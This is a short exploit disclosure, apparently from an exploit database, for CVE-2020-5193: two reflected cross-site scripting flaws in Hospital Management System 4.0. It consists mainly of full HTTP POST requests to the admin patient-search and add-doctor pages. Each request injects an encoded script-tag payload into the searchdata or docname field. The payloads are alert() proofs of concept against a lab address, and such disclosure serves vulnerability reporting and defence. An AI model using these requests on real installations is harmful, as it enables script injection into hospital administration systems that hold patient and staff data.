Share
> # Exploit Title: Hospital Management System 4.0 Multiple Reflected XSS  
> # Google Dork: N/A  
> # Date: 1/2/2020  
> # Exploit Author: FULLSHADE  
> # Vendor Homepage: https://phpgurukul.com/  
> # Software Link: https://phpgurukul.com/hospital-management-system-in-php/  
> # Version: v4.0  
> # Tested on: Windows  
> # CVE : CVE-2020-5193  
>  
> ================ 1 - Cross Site Scripting (Reflected) ================  
>  
> POST /hospital/hospital/hms/admin/patient-search.php HTTP/1.1  
> Host: 10.0.0.214  
> User-Agent: Mozilla/5.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded  
> Content-Length: 74  
> Origin: http://10.0.0.214  
> DNT: 1  
> Connection: close  
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/patient-search.php  
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
> Upgrade-Insecure-Requests: 1  
>  
> searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search=  
>  
> ?searchdata parameter is vulnerable to reflected XSS in the search field  
>  
> ================ 2 - Cross Site Scripting (Reflected) ================  
>  
> POST /hospital/hospital/hms/admin/add-doctor.php HTTP/1.1  
> Host: 10.0.0.214  
> User-Agent: Mozilla/5.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded  
> Content-Length: 187  
> Origin: http://10.0.0.214  
> DNT: 1  
> Connection: close  
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/add-doctor.php  
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
> Upgrade-Insecure-Requests: 1  
>  
> Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&clinicaddress=123&docfees=123&doccontact=123&docemail=123%40gmail.com&npass=123&cfpass=123&submit=  
>  
> ?docname parameter is vulnerable to refleced XSS when managing and adding a new doctor